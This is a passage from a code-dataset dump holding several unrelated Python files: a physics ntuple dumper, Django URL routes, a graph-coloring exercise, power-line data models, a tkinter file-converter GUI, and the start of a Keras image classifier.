sys,os\n\nparser = argparse.ArgumentParser(description = '', add_help = False)\nparser = argparse.ArgumentParser()\n\n#\n# job configuration\n#\n\nparser.add_argument('-i','--inputFiles', action='store',\n dest='inputFiles', required = True, nargs='+',\n help = \"The input files.\")\n\nparser.add_argument('-o','--outputFile', action='store',\n dest='outputFile', required = False, default = None,\n help = \"The output name.\")\n\nparser.add_argument('-n','--nov', action='store',\n dest='nov', required = False, default = -1, type=int,\n help = \"Number of events.\")\n\nparser.add_argument('-p','--path', action='store',\n dest='path', required = False, default='*/HLT/Physval/Egamma/probes', type=str,\n help = \"Ntuple base path.\")\n\nparser.add_argument('-l','--level', action='store',\n dest='level', required = False, type=str, default='INFO',\n help = \"VERBOSE/INFO/DEBUG/WARNING/ERROR/FATAL\")\n\nparser.add_argument('--mute', action='store_true',\n dest='mute', required = False, \n help = \"Use this for production. 
quiet output\")\n\n#\n# event selection configuration\n#\n\nparser.add_argument('--et_bins', action='store',\n dest='et_bins', required = False, type=str, default='[15.0, 20.0, 30.0, 40.0, 50.0, 100000]',\n help = \"et bin ranges\")\n \nparser.add_argument('--eta_bins', action='store',\n dest='eta_bins', required = False, type=str, default='[0.0, 0.8, 1.37, 1.54, 2.37, 2.50]',\n help = \"eta bin ranges\")\n\nparser.add_argument('--pidname', action='store',\n dest='pidname', required = False, type=str, default='el_lhvloose',\n help = \"Offline pid cut.\") \n\nparser.add_argument('--et_min', action='store',\n dest='et_min', required = False, type=int, default=0,\n help = \"Fast calo min et value in GeV.\") \n\nparser.add_argument('--et_max', action='store',\n dest='et_max', required = False, type=int, default=1000,\n help = \"Fast calo max et value in GeV\") \n\n#parser.add_argument('--old_path', action='store_true',\n# dest='old_path', required = False, \n# help = \"Use 2017 physval ntuple path\") \n\n\n\n\nif len(sys.argv)==1:\n parser.print_help()\n sys.exit(1)\n\nargs = parser.parse_args()\n\n\n\nacc = ElectronLoop( \"EventATLASLoop\",\n inputFiles = args.inputFiles,\n treePath = eval(args.path),\n dataframe = DataframeEnum.Electron_v1,\n outputFile = args.outputFile,\n level = getattr(LoggingLevel, args.level),\n mute_progressbar = args.mute,\n )\n\n\n\n#extra_keys+= install_Zee_ringer_v6()\n#extra_keys+= install_Zee_ringer_v8()\nfrom kepler.menu.install import install_commom_features_for_electron_dump\nextra_features = install_commom_features_for_electron_dump() \n\n\nfrom kepler.dumper import ElectronDumper\netbins = [15,100]\netabins = [0,2.5]\n\nfrom kepler.filter import Filter, SelectionType, EtCutType\nfilter = Filter(\"ElectronFilter\")\n\nfilter.setCutValue(SelectionType.SelectionOnlineWithRings)\nfilter.setCutValue(EtCutType.OfflineAbove, 2) # this is default for now\nfilter.setCutValue( SelectionType.SelectionPID, eval(args.pidname) )\nfilter.setCutValue( EtCutType.L2CaloAbove, args.et_min )\nfilter.setCutValue( EtCutType.L2CaloBelow, args.et_max )\n\nToolSvc+=filter\n\noutput = args.outputFile.replace('.root','')\n\ndumper = ElectronDumper(\"Dumper\", output, eval(args.et_bins), eval(args.eta_bins), dumpRings=True)\ndumper += extra_features\nToolSvc+=dumper\n\nacc.run(args.nov)\n\n\n","sub_path":"share/dump_electron.py","file_name":"dump_electron.py","file_ext":"py","file_size_in_byte":3664,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"169194613","text":"\"\"\"Defines the URL patterns for BLOGS\"\"\"\r\n\r\nfrom django.urls import path\r\nfrom . 
import views\r\n\r\napp_name = 'blogs'\r\nurlpatterns = [\r\n # Home page\r\n path('', views.index, name='index'),\r\n\r\n # Page for adding a new post.\r\n path('new_post/', views.new_post, name='new_post'),\r\n\r\n # Page for editing a post.\r\n path('edit_post//', views.edit_post, name='edit_post'),\r\n]","sub_path":"blog/blogs/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":515,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"93809460","text":"\"\"\"\nYou are given an undirected graph with its maximum degree (the degree of a node\nis the number of edges connected to the node).\n\nYou need to write a function that can take an undirected graph as its argument\nand color the graph legally (a legal graph coloring is when no adjacent nodes\nhave the same color).\n\nThe number of colors necessary to complete a legal coloring is always one more\nthan the graph's maximum degree.\n\"\"\"\n# Definition for a graph node.\nclass GraphNode:\n def __init__(self, label):\n self.label = label\n self.neighbors = set()\n self.color = None\n\ndef color_graph(graph, colors):\n # Your code here\n for node in graph:\n legalColors = colors.copy()\n\n # Find the restricted colors for this node and remove them from our legal colors list above ^\n for neighbor in node.neighbors:\n if neighbor.color is not None and neighbor.color in legalColors:\n # Find the index and pop it\n colorIdx = legalColors.index(neighbor.color)\n legalColors.pop(colorIdx)\n\n # Set the node's color to the first item in the legal colors list\n node.color = legalColors[0]\n\n\ng1 = GraphNode('G1')\ng2 = GraphNode('G2')\ng3 = GraphNode('G3')\ng4 = GraphNode('G4')\ng5 = GraphNode('G5')\n\ng1.neighbors.add(g2)\ng1.neighbors.add(g4)\ng1.neighbors.add(g3)\n\ng2.neighbors.add(g1)\ng2.neighbors.add(g4)\ng2.neighbors.add(g5)\n\ng3.neighbors.add(g1)\ng3.neighbors.add(g5)\ng3.neighbors.add(g4)\n\ng4.neighbors.add(g1)\ng4.neighbors.add(g2)\ng4.neighbors.add(g3)\ng4.neighbors.add(g5)\n\ng5.neighbors.add(g2)\ng5.neighbors.add(g3)\ng5.neighbors.add(g4)\n\ngraph = [g1, g2, g3, g4, g5]\ncolors = ['red', 'green', 'blue', 'purple', 'orange']\n\ncolor_graph(graph, colors)\n\nfor node in graph:\n print(node.color)","sub_path":"src/demonstration_1.py","file_name":"demonstration_1.py","file_ext":"py","file_size_in_byte":1782,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"125859936","text":"from enum import Enum,unique\nimport sqlhelper\n\n\nclass Tower:\n def __init__(self):\n self.serialNum=-1\n self.title=None\n self.towerType=-1\n self.longitude=-1\n self.latitude=-1\n self.preTower=-1\n self.nextTower=-1\n self.crossLineType=-1\n self.preLine=-1\n self.nextLine=-1\n self.towerHeight=-1\n self.branch01=-1\n self.branch02=-1\n self.branch03=-1\n def __repr__(self):\n return repr(self.serialNum,self.title,self.towerType,self.longitude,self.latitude,self.preTower,self.nextTower,self.crossLineType,self.preLine,self.nextLine,self.towerHeight,self.branch01,self.branch02,self.branch03)\n\nclass LineTool:\n def __init__(self,serialNumber,title = None,type=-1,longitude=-1,latitude=-1,lineSerialNum=-1,preTower=-1,nextTower=-1,preObstacle=-1,nextObstacle=-1,length=-1,cruiseFlag=-1):\n self.serialNumber = serialNumber\n self.title = title\n self.type=type\n self.longitude=longitude\n self.latitude=latitude\n self.lineSerialNum=lineSerialNum\n self.preTower=preTower\n self.nextTower=nextTower\n 
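# the fields below link this tool to its neighbouring obstacles and record the segment length and cruise flag\n 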
self.preObstacle=preObstacle\n self.nextObstacle=nextObstacle\n self.length=length\n self.cruiseFlag=cruiseFlag\n def __repr__(self):\n return repr(self.serialNumber,self.title,self.type,self.longitude,self.latitude,self.lineSerialNum,self.preTower,self.nextTower,self.preObstacle,self.nextObstacle,self.length,self.cruiseFlag)\n\nclass PointTool:\n def __init__(self):\n self.serialNumber = None\n self.title = None\n self.type = None\n self.longitude = None\n self.latitude = None\n self.lineSerialNum = None\n self.preTower = None\n self.nextTower = None\n self.preObstacle = None\n self.nextObstacle = None\n self.relativeCoord01=None\n self.relativeCoord02 = None\n def __repr__(self):\n return repr(self.serialNumber,self.title,self.type,self.longitude,self.latitude,self.lineSerialNum,self.preTower,self.nextTower,self.preObstacle,self.nextObstacle,self.relativeCoord01,self.relativeCoord02)\n\nclass Circuit:\n def __init__(self,serialNumber=-1,title = None,type = -1,preTower=-1,nextTower=-1,obstacleNum=0,directionAngle=0,relativeCoord01=-1,relativeCoord02=-1):\n self.serialNumber = serialNumber\n self.title = title\n self.type = type\n self.preTower = preTower\n self.nextTower= nextTower\n self.obstacleNum =obstacleNum\n self.directionAngle =directionAngle\n self.relativeCoord01 =relativeCoord01\n self.relativeCoord02 =relativeCoord02\n def __repr__(self):\n return repr(self.serialNumber,self.title,self.type,self.preTower,self.nextTower,self.obstacleNum,self.directionAngle,self.relativeCoord01,self.relativeCoord02)\n\n#special navigation route\nclass RouteMap:\n def __init__(self,serialNumber=None,title=None,routeIsExist=None,beginTower=None,endTower=None,mapData=None,distance=0,towerNum=0,powerNum=0,obstacleNum=0):\n self.serialNumber=serialNumber\n self.title=title\n self.routeIsExist=routeIsExist\n self.beginTower=beginTower\n self.endTower=endTower\n self.mapData=mapData\n self.distance=distance\n self.towerNum=towerNum\n self.powerNum=powerNum\n self.obstacleNum=obstacleNum\n def __repr__(self):\n return repr(self.serialNumber,self.title,self.beginTower,self.endTower,self.mapData,self.distance,self.towerNum,self.powerNum,self.obstacleNum)\n\nclass CompoundCircuit:\n def __init__(self,circuit):\n self.circuit=circuit\n self.toolList=self.setAllTools()\n def __repr__(self):\n return repr(self.circuit,self.toolList)\n def setAllTools(self):\n circuitSerialNum=self.circuit.serialNumber\n toolsList=[]\n if circuitSerialNum!=-1 or circuitSerialNum!=None:\n dbOp=sqlhelper.dbcrud()\n condition='lineSerialNum='+str(circuitSerialNum)+' order by serialNumber asc'\n data =dbOp.queryData('lineTools','serialNumber,title,type,longitude,latitude,lineSerialNum,preTower,nextTower,preObstacle,nextObstacle,length,cruiseFlag',condition);\n if len(data)>0:\n for i in data:\n tool=LineTool(serialNumber=i[0],title=i[1],type=i[2],longitude=i[3],latitude=i[4],lineSerialNum=i[5],preTower=i[6],nextTower=i[7],preObstacle=i[8],nextObstacle=i[9],length=i[10],cruiseFlag=i[11])\n toolsList.append(tool)\n return toolsList\n\nclass CompoundMapSegment:\n def __init__(self,preTower,nextTower,compoundCircuit):\n self.preTower=preTower\n self.nextTower=nextTower\n self.compoundCircuit=compoundCircuit\n self.number=self.compoundCircuit.circuit.serialNumber\n\n def __repr__(self):\n return repr(self.preTower,self.nextTower,self.compoundCircuit)\n#task type enum value\nclass TaskType(Enum):\n one=0\n two=1\n three=2\n four=3\n five=4\n six=5\n seven=6\n\n\nclass ObjType(Enum):\n tower=0\n lineTool01=1\n lineTool02=2\n 
pointTool=3\n\n\nclass JSONObject:\n def __init__(self, d):\n self.__dict__ = d\n\n# GPS位置数据类型\nclass LocationMsg:\n def __init__(self,longitude=-1,latitude=-1):\n self.longitude=longitude\n self.latitude=latitude\n def __repr__(self):\n return repr(self.longitude,self.latitude)\n\n#TODO GPS卫星数据类型\nclass GPSMsg:\n def __init__(self,GPGSV,GPGLL,GORMC,GPVTG,GPGGA,GPGSA):\n pass\n\n\nclass MapSegWidget:\n def __init__(self,type,name,serialNum,longitude,latitude,preObj=-1,nextObj=-1,length=-1,isPassed=False):\n\n self.name=name\n self.type=type\n self.serialNum=serialNum\n self.longitude=longitude\n self.latitude=latitude\n self.preObj=preObj\n self.nextObj=nextObj\n self.length=length\n self.isPassed=isPassed\n\n#TODO 设置导航提醒的距离枚举\nclass NavigationRemidDis(Enum):\n arrive=0\n close=1\n near=2\n\n\n\n\n\n","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":6064,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"393836686","text":"import tkinter\nfrom tkinter import messagebox as dialog, filedialog as file_wm\nimport os\nfrom typing import Dict, Any\n\nfrom com.zcnst.constant import mainFinal\nfrom com.zcnst.service import file_convert as convert\nfrom threading import Thread\n\ndef msgDialog(level: int, msg: str):\n '''\n 消息对话框\n :param level: 消息级别\n :param msg: 消息\n :return:\n '''\n if level <= 0:\n dialog.showinfo(\"提示\", msg)\n elif level == 1:\n dialog.showwarning(\"警告\", msg)\n else:\n dialog.showerror(\"错误\", msg)\n\n\ndef start_convert_event(wm, event, fileChoice=None, symbol=tkinter.Entry, encoding=str, coord=()):\n if convert.getConvertState():\n return\n convert.setConverted()\n\n files = fileChoice.get_files()\n del fileChoice\n symbol_text = symbol.get()\n if files.__len__() == 0:\n msgDialog(1, \"请选择文本文件!\")\n elif symbol_text == \"\":\n msgDialog(1, \"请输入分割符!\")\n else:\n convert.setConverting()\n progress = Progress(wm.getCanvas(), x1=coord[0], y1=coord[1], x2=coord[2], y2=coord[3], outline='#FFE300', backageColor='#2B9ADA', progressColor='#84D945')\n convert.ConvertThreading(event, files, encoding, symbol_text, progress, wm).start()\n wm.update()\n\n\nclass Window(tkinter.Tk):\n eventMode: Dict[Any, Dict[Any, Any]]\n _init_width, _init_height = 700, 400\n _main_wm = _progress = None\n\n def setCanvas(self, canvas=tkinter.Canvas):\n self._main_wm = canvas\n\n def getCanvas(self):\n return self._main_wm\n\n def __init__(self):\n super(Window, self).__init__()\n self.title(mainFinal.WIN_TITLE_STR)\n self.wm_iconname(mainFinal.WIN_TITLE_STR)\n self.wm_overrideredirect(True) # 去掉标题栏\n self.wm_resizable(width=False, height=False) # 禁止窗口最大化和拉伸\n self.wm_attributes(\"-topmost\", True, \"-alpha\", 1) # 置顶窗体,且透明度为80%\n self.wm_iconbitmap(bitmap=mainFinal.WIN_ICON_PATH)\n\n # 设置窗口的初始位置居中\n screen = self._get_vga()\n x = (screen[\"W\"] - self._init_width) / 2\n y = (screen[\"H\"] - self._init_height) / 2\n self.wm_geometry(\"%dx%d+%d+%d\" % (self._init_width, self._init_height, x, y))\n\n # 改变背景色, kwargs 传入的是字典\n def changeBg(self, event, kwargs):\n event.widget.config(bg=kwargs[\"color\"])\n\n # 最小化窗口\n def minimize(self, event, args):\n self.withdraw()\n self.wm_overrideredirect(False)\n self.state(\"iconic\")\n\n # 最小化后恢复窗口\n def frame_mapped(self, event):\n self.wm_overrideredirect(True)\n self.deiconify()\n\n # 移动窗口事件\n def select_wid(self, event):\n self.x = event.x\n self.y = event.y\n\n def stop_wid(self, event):\n self.x = None\n self.y = None\n\n def moving_wid(self, event):\n new_x = (event.x - 
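# Note on the model.py record above: every __repr__ there does
# `return repr(self.a, self.b, ...)`, but the built-in repr() accepts exactly
# one argument, so calling repr() on a Tower/LineTool/Circuit instance raises
# TypeError. A corrected sketch of the pattern, using a hypothetical Point
# class as a stand-in for those classes:

class Point:
    def __init__(self, serialNumber=-1, title=None, longitude=-1, latitude=-1):
        self.serialNumber = serialNumber
        self.title = title
        self.longitude = longitude
        self.latitude = latitude

    def __repr__(self):
        # Build one string instead of passing several values to repr().
        return ('Point(serialNumber={!r}, title={!r}, longitude={!r}, '
                'latitude={!r})').format(self.serialNumber, self.title,
                                         self.longitude, self.latitude)

print(Point(7, 'T7', 120.1, 30.5))
# Point(serialNumber=7, title='T7', longitude=120.1, latitude=30.5)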
self.x) + self.winfo_x()\n new_y = (event.y - self.y) + self.winfo_y()\n self.wm_geometry(\"+%d+%d\" % (new_x, new_y))\n\n # 关闭窗口\n def close(self, event, args):\n os._exit(0)\n\n # 鼠标悬浮,事件\n def hoverEvent(self, fun, event, **args):\n if \"mode\" in args and args[\"mode\"] == \"IN\":\n self.eventMode = {event.widget._name: {\"focus\": True}}\n else:\n self.eventMode = None\n fun(event, args)\n\n # 鼠标单击事件\n def clickOn(self, fun, event, **kwargs):\n eventMode, widNmae = self.eventMode, event.widget._name\n if eventMode is not None:\n if widNmae in eventMode and eventMode[widNmae][\"focus\"]:\n fun(event, kwargs)\n\n def init_main_wm(self):\n \"\"\"\n 初始化自定义窗口背景\n :return:\n \"\"\"\n\n # 添加背景图片\n global image\n image = mainFinal.WIN_TITLE_BACK_IMG(mainFinal.WIN_BACK_IMG_PATH, self._init_width, self._init_height)\n main_wm = tkinter.Canvas(self, width=self._init_width, height=self._init_height, bg=\"green\", highlightthickness=0)\n main_wm.create_image((0, 0), anchor=tkinter.NW, image=image)\n main_wm.pack(side=tkinter.TOP, fill=tkinter.BOTH, expand=False)\n\n # 添加窗口图标\n global icon\n icon = mainFinal.WIN_TITLE_BACK_IMG(mainFinal.WIN_APP_LOGO, 64, 64)\n icon_label = tkinter.Label(self, width=60, height=60, bg=\"#042900\", image=icon, borderwidth=0)\n main_wm.create_window((70, 35), window=icon_label, anchor=tkinter.NW)\n\n # 添加窗口标题\n main_wm.create_text((self._init_width / 2 - 108, 45), text=mainFinal.WIN_TITLE_STR, font=(\"黑体\", 24, \"bold\"), fill=\"#1AFA29\", anchor=tkinter.NW)\n\n # 添加菜单\n global imageMenu\n imageMenu = mainFinal.WIN_TITLE_BACK_IMG(mainFinal.WIN_MENU_IMG, 16, 16)\n self.codingVar = tkinter.StringVar()\n self.codingVar.set(\"UTF-8\")\n mb = tkinter.Menubutton(self, name=\"menuCharCode\", width=32, height=26, image=imageMenu, bd=0, bg=\"#3C3F41\", fg=\"white\", activebackground=\"red\",\n relief=tkinter.FLAT)\n filemenu = tkinter.Menu(mb, tearoff=False, bg=\"#3C3F41\", bd=0, activebackground=\"red\", font=(\"黑体\", 10), fg=\"white\", relief=tkinter.FLAT)\n for item in [\"ANSI\", \"ASCII \", \"UTF-8\", \"UTF-16\", \"UTF-32\", \"GBK\", \"GB2312\", \"GB18030\", \"BIG5\", \"ISO8859-1\", \"ISO8859-2\",\n \"ISO8859-3\", \"ISO8859-4\", \"ISO8859-5\", \"ISO8859-6\", \"ISO8859-7\", \"ISO8859-15\", \"ISO8859-16\"]:\n filemenu.add_radiobutton(label=item, command=None, variable=self.codingVar, value=item, selectcolor=\"white\")\n mb.config(menu=filemenu)\n main_wm.create_window((self._init_width - 96, 0), window=mb, anchor=tkinter.NW)\n\n # 添加最小化\n global ImageMinimize\n ImageMinimize = mainFinal.WIN_TITLE_BACK_IMG(mainFinal.WIN_MIN_IMG, 16, 16)\n bt = tkinter.Button(self, name=\"minimize\", width=32, height=24, image=ImageMinimize, bd=0, bg=\"#3C3F41\", activebackground=\"red\", relief=tkinter.FLAT)\n bt.bind(\"\", lambda event: self.hoverEvent(self.changeBg, event=event, color=\"red\", mode=\"IN\"))\n bt.bind(\"\", lambda event: self.hoverEvent(self.changeBg, event=event, color=\"#3C3F41\"))\n bt.bind(\"\", lambda event: self.clickOn(self.minimize, event))\n main_wm.create_window((self._init_width - 64, 0), window=bt, anchor=tkinter.NW)\n\n # 最小化后显示窗口\n self.bind(\"\", self.frame_mapped)\n\n # 移动窗口\n main_wm.bind(\"\", self.select_wid)\n main_wm.bind(\"\", self.stop_wid)\n main_wm.bind(\"\", self.moving_wid)\n\n # 添加窗口关闭按钮\n global imageClose\n imageClose = mainFinal.WIN_TITLE_BACK_IMG(mainFinal.WIN_CLOSE_IMG, 16, 16)\n bt = tkinter.Button(self, name=\"close\", width=32, height=24, image=imageClose, bd=0, bg=\"#3C3F41\", activebackground=\"red\", relief=tkinter.FLAT)\n bt.bind(\"\", 
lambda event: self.hoverEvent(self.changeBg, event=event, color=\"red\", mode=\"IN\"))\n bt.bind(\"\", lambda event: self.hoverEvent(self.changeBg, event=event, color=\"#3C3F41\"))\n bt.bind(\"\", lambda event: self.clickOn(self.close, event))\n main_wm.create_window((self._init_width - 32, 0), window=bt, anchor=tkinter.NW)\n\n self.setCanvas(main_wm)\n\n def init_component(self):\n \"\"\"\n 初始化组件\n :return:\n \"\"\"\n main_wm = self.getCanvas()\n\n entryStartPosition = self._init_width / 2 - 180\n\n # 输入目录��段说明文字 及 输入控件\n field_style, entry_style = mainFinal.WIN_FIELD_STYLE, mainFinal.WIN_ENTRY_STYLE\n main_wm.create_text(35, 145, text=\"待转换的文件:\", anchor=tkinter.NW, font=field_style[\"font\"], fill=field_style[\"fill\"])\n fileChoice = FileChoice(self, \"请选择TXT文件 或 包含TXT文件夹!\")\n fileChoice.set_relief(tkinter.FLAT).set_font(entry_style[\"font\"]).set_bd(entry_style[\"bd\"]).set_bg(entry_style[\"bg\"]).set_fg(\n entry_style[\"fg\"]).set_highlightbackground(entry_style[\"highlightbackground\"]).set_selectbackground(\n entry_style[\"selectbackground\"]).set_highlightcolor(entry_style[\"highlightcolor\"])\n fileDialog = fileChoice.composition(takefocus=False, width=60, title=\"请选择TXT文件,可选择多个!\", fileType=[(\"TXT文件\", \".txt\"),(\"CSV文件\",\".CSV\")])\n main_wm.create_window(entryStartPosition, 140, window=fileDialog, anchor=tkinter.NW)\n\n # 输入分隔符字段说明文字 及 输入控件\n main_wm.create_text(35, 215, text=\"请输入分隔符:\", anchor=tkinter.NW, font=field_style[\"font\"], fill=field_style[\"fill\"])\n decollatorValue = tkinter.StringVar(self, \"|\")\n decollator = tkinter.Entry(self, width=60, textvariable=decollatorValue, cnf=entry_style, takefocus=False)\n main_wm.create_window(entryStartPosition, 210, window=decollator, anchor=tkinter.NW)\n\n global runIco\n runIco = mainFinal.WIN_TITLE_BACK_IMG(mainFinal.WIN_RUN_IMG, 24, 24)\n runBut = tkinter.Button(text=\"开始转换 \", name=\"runConversion\", image=runIco, bg=\"green\", bd=0, highlightthickness=4, font=(\"黑体\", 16, \"bold\"), \\\n fg=\"#EBEEEF\", width=140, height=24, relief=\"flat\", takefocus=False, activebackground=\"#FFE300\", \\\n activeforeground=\"#84D945\", compound=tkinter.RIGHT, highlightcolor=\"#FFE300\")\n runBut.bind(\"\", lambda event: self.hoverEvent(self.changeBg, event=event, color=\"red\", mode=\"IN\"))\n runBut.bind(\"\", lambda event: self.hoverEvent(self.changeBg, event=event, color=\"green\"))\n runFun = lambda event, kwargs: start_convert_event(self, event, fileChoice, decollator, self.codingVar.get(), kwargs[\"coord\"])\n runBut.bind(\"\", lambda event: self.clickOn(runFun, event, coord=(35, 350, self._init_width - 35, 370)))\n\n main_wm.create_window(self._init_width / 2 - 80, 280, window=runBut, anchor=tkinter.NW)\n\n def show_windows(self):\n \"\"\"\n 显示程序\n :return:\n \"\"\"\n self.init_main_wm()\n self.init_component()\n self.mainloop()\n\n def _get_vga(self):\n \"\"\"\n 获取屏幕的分辨率\n :return: 返回字典类型值;X, Y\n \"\"\"\n return {\"W\": self.winfo_screenwidth(), \"H\": self.winfo_screenheight()}\n\n\nclass Progress:\n \"\"\"\n 进度条\n \"\"\"\n\n def __init__(self, canvas=tkinter.Canvas, x1=int, y1=int, x2=int, y2=int, outline=str, backageColor=str, progressColor=str):\n \"\"\"\n 初始化进度条\n :param canvas:画布\n :param outline:边框颜色\n :param backageColor:进度条背景\n :param progressColor:进度色彩\n \"\"\"\n self.x1 = x1\n self.y1 = y1\n self.x2 = x2\n self.y2 = y2\n self.width, self.height = self.x2 - self.x1, self.y2 - self.y1\n self.progress_out = canvas.create_rectangle(self.x1, self.y1, self.x2, self.y2, outline=outline, fill=backageColor)\n 
self.progress_in = canvas.create_rectangle(self.x1, self.y1, self.x1, self.y2, outline=progressColor, fill=progressColor)\n self.canvas = canvas\n\n textValue = \"0 %\"\n text_x1 = (self.width / 2 + self.x1) - (textValue.__len__() * 10)\n font_size = int(self.height / 10 + 10)\n text_y1 = (self.height - font_size) / 2 + self.y1\n self.propress_txt = canvas.create_text(text_x1, text_y1, text=textValue, anchor=tkinter.NW, font=(\"宋体\", font_size, \"bold\"), fill=outline)\n\n def update_progress(self, wm=tkinter.Tk, finish_rate=float):\n \"\"\"\n 更新进度条\n :param wm:父窗口\n :param finish_rate:完成率 0-1,1最大\n :return:\n \"\"\"\n # ((x2-x2 【确定了进度条的长度】) * 完成率【增加的实际长度】)+x1=增加后的实际x2坐标\n new_x2 = (self.width * finish_rate) + self.x1\n self.canvas.coords(self.progress_in, (self.x1, self.y1, (self.x2 if new_x2 >= self.x2 else new_x2), self.y2))\n self.canvas.itemconfig(self.propress_txt, text=\"{:.0%}\".format(finish_rate))\n wm.update()\n\n def clearProgress(self):\n \"\"\"\n 清除进度条\n :return:\n \"\"\"\n self.canvas.delete(self.progress_in, self.progress_out, self.propress_txt)\n\n\nclass FileChoice(tkinter.Frame):\n \"\"\"\n 文���选择框\n \"\"\"\n wm, path_choice, choice_but, hintMsg = None, None, None, None\n hintMsgStr = \"\"\n cnf, btcnf = {}, {}\n select_files = []\n\n def __init__(self, wm, hintMsg):\n self.wm = wm\n self.hintMsgStr = hintMsg\n super(FileChoice, self).__init__(self.wm)\n self.hintMsg = tkinter.StringVar(self.wm, hintMsg)\n\n def set_bg(self, color=str):\n if color.strip() != \"\":\n self.cnf[\"bg\"] = color\n return self\n\n def set_fg(self, color=str):\n if color.strip() != \"\":\n self.cnf[\"fg\"] = color\n self.btcnf[\"fg\"] = color\n return self\n\n def set_highlightbackground(self, color=str):\n if color.strip() != \"\":\n self.cnf[\"highlightbackground\"] = color\n self.btcnf[\"bg\"] = color\n self.btcnf[\"activeforeground\"] = color\n return self\n\n def set_highlightcolor(self, color=str):\n if color.strip() != \"\":\n self.cnf[\"highlightcolor\"] = color\n return self\n\n def set_selectbackground(self, color=str):\n if color.strip() != \"\":\n self.cnf[\"selectbackground\"] = color\n self.btcnf[\"activebackground\"] = color\n return self\n\n def set_bd(self, value=int):\n if value > 0:\n self.cnf[\"bd\"] = value\n self.cnf[\"highlightthickness\"] = value\n self.btcnf[\"bd\"] = 0\n self.btcnf[\"highlightthickness\"] = value * 2 - 1\n return self\n\n def set_relief(self, value=str):\n if value.split() != \"\":\n self.cnf[\"relief\"] = value\n self.btcnf[\"relief\"] = value\n return self\n\n def set_font(self, font=()):\n if font.__len__() > 0:\n self.cnf[\"font\"] = font\n self.btcnf[\"font\"] = (\"楷书\", (font[1] - 1))\n return self\n\n def composition(self, takefocus=bool, width=int, title=None, fileType=[]):\n but_width = 10\n entry_width = width - but_width\n frame = tkinter.Frame(self.wm, width=width, highlightthickness=0, bd=0)\n self.path_choice = tkinter.Entry(frame, cnf=self.cnf, takefocus=takefocus, width=entry_width, textvariable=self.hintMsg)\n self.path_choice.bind(\"\", lambda event: self._buttonRelease_1(event, title, fileType))\n self.path_choice.pack(side=tkinter.LEFT, anchor=tkinter.W, expand=\"yes\", fill=tkinter.BOTH, ipadx=0, ipady=0, padx=0, pady=0)\n self.choice_but = tkinter.Button(frame, cnf=self.btcnf, text=\"浏览...\", width=but_width, takefocus=takefocus)\n self.choice_but.bind(\"\", lambda event: self._buttonRelease_1(event, title, fileType))\n self.choice_but.pack(side=tkinter.RIGHT, anchor=tkinter.E, expand=\"no\", fill=tkinter.BOTH, padx=0, pady=0)\n\n 
return frame\n\n def get_files(self):\n return self.select_files.copy()\n\n def _buttonRelease_1(self, event, title=None, fileType=None):\n \"\"\"\n 点击 选择文件或文件框事件\n :param event: 监听事件的对象\n :param title: 文件选择框的对象\n :param fileType: 文件类型,为列表元组类型 [(\"文件类型描述\",\"文件后缀,如“.txt”\")]\n :return:\n \"\"\"\n Thread(target=self._fileFiltrate, args=(event, title, fileType)).start()\n self.wm.focus_set()\n\n def _fileFiltrate(self, event, title, fileType):\n title = \"请选择文件\" if title == None else title\n fileType = [(\"请选择文件\", \"*\")] if fileType == None and fileType.__len__() <= 0 else fileType\n widget = event.widget\n if isinstance(widget, tkinter.Entry):\n pathvalue = file_wm.askopenfilenames(title=title, filetypes=fileType)\n elif isinstance(widget, tkinter.Button):\n pathvalue = file_wm.askdirectory(title=\"请选择路径!\", mustexist=True)\n\n if self.select_files.__len__() > 0:\n self.select_files.clear()\n\n if not pathvalue:\n self.hintMsg.set(value=self.hintMsgStr)\n return\n elif isinstance(pathvalue, tuple):\n self.select_files.extend(list(pathvalue))\n elif isinstance(pathvalue, str):\n for dir in os.listdir(pathvalue):\n tempStr = os.path.join(pathvalue, dir)\n if os.path.isfile(tempStr) and dir.endswith(fileType[0][1]):\n self.select_files.append(tempStr)\n\n if len(self.select_files) == 1:\n self.hintMsg.set(value=self.select_files[0])\n else:\n filenamelist = []\n for file_path in self.select_files:\n filenamelist.append(os.path.split(file_path)[1])\n self.hintMsg.set(value=\";\".join(filenamelist))\n","sub_path":"com/zcnst/view/window.py","file_name":"window.py","file_ext":"py","file_size_in_byte":17271,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"548193943","text":"#Loading require library\nimport pandas as pd # data processing, CSV file I/O (e.g. 
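# The Progress.update_progress method in the window.py record above computes
# the inner bar's right edge as x1 + width * finish_rate, clamped at x2. A
# display-free sketch of that arithmetic (progress_coords is a hypothetical
# helper, not part of the record), so the geometry can be checked without Tk:

def progress_coords(x1, y1, x2, y2, finish_rate):
    # Right edge of the filled rectangle grows linearly with the finish rate.
    width = x2 - x1
    new_x2 = x1 + width * finish_rate
    return (x1, y1, min(new_x2, x2), y2)

print(progress_coords(35, 350, 665, 370, 0.5))  # (35, 350, 350.0, 370)
print(progress_coords(35, 350, 665, 370, 1.2))  # clamped: (35, 350, 665, 370)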
pd.read_csv)\nimport os,cv2\nfrom IPython.display import Image\nfrom tensorflow.keras.preprocessing import image\nfrom tensorflow.keras import optimizers\nfrom tensorflow.keras import layers, models\nfrom tensorflow.keras.layers import Conv2D\nfrom tensorflow.keras.applications.imagenet_utils import preprocess_input\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom tensorflow.keras import regularizers\nfrom tensorflow.keras.preprocessing.image import ImageDataGenerator\nfrom tensorflow.keras.applications.vgg16 import VGG16\n#print(os.listdir(\"/Users/napasin_h/Desktop/aerial-cactus-identification\"))\nimport numpy as np\n\ntrain_dir = \"/Users/napasin_h/Desktop/aerial-cactus-identification/train\"\ntest_dir = \"/Users/napasin_h/Desktop/aerial-cactus-identification/test\"\ntrain = pd.read_csv('/Users/napasin_h/Desktop/aerial-cactus-identification/train.csv')\ndf_test = pd.read_csv('/Users/napasin_h/Desktop/aerial-cactus-identification/sample_submission.csv')\n\n#Data preparation\n #Read picture file\n #Decode JPEG content to RGB pixels\n #Convert this into floating tensors\n #Rescale pixels values(0-255) to [0, 1] interval\n#add arguement 'validation_split' for spliting data automatically and add 